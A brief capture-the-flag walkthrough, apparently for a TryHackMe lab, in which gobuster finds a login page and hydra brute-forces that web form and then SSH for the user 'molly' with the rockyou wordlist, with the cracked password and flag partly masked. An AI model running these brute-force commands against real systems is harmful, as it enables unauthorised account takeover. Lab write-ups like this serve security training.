	flag 1:


	check login URL


	gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt          
	{/login (Status: 200)}


	hydra cmd : 

	hydra -l molly -P /root/Desktop/rockyou.txt $ip http-post-form "/login:username=^USER^&						password=^PASS^:incorrect" -V



	<!--
	[80][http-post-form] host: $ip   login: molly   password: su*****ne
	-->

	THM{*67******1**e******4**c******12*}

	flag 2:

	hydra -l molly -P rockyou.txt $ip ssh

	then login as molly on ssh 
	You will find the second flag in here.


	Thank You :)
